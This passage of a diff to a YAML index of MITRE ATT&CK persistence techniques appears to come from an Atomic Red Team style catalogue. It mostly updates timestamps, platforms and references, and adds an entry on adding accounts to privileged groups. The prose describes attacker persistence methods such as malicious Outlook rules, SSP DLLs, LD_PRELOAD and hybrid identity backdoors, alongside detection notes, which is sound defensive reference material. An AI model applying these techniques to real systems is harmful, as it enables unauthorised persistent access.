           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -29823,7 +30257,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -29878,13 +30312,11 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -29945,9 +30377,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -29956,7 +30388,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -30009,7 +30440,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -30030,12 +30461,11 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -30119,11 +30549,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -30136,7 +30565,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -30149,7 +30577,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -30179,7 +30606,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1525:
@@ -30211,7 +30639,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -30233,8 +30661,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -30260,7 +30686,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30286,36 +30712,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -30323,9 +30747,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -30334,21 +30758,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -30388,13 +30813,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30471,12 +30893,11 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30495,6 +30916,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -30502,7 +30924,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -30522,29 +30943,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1505.003:
@@ -30621,12 +31044,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30641,6 +31063,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -30649,18 +31072,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -30692,9 +31115,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -30766,7 +31186,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -30793,7 +31212,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -30819,13 +31238,11 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -30946,7 +31363,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1136.001:
@@ -31018,7 +31434,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests: []
   T1547.004:
@@ -31088,7 +31503,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -31198,7 +31612,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -31252,7 +31665,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31285,8 +31698,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1574.005:
@@ -31317,7 +31728,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31352,12 +31763,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31434,7 +31843,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1136.002:
@@ -31488,7 +31896,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests: []
   T1542.002:
@@ -31520,7 +31927,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
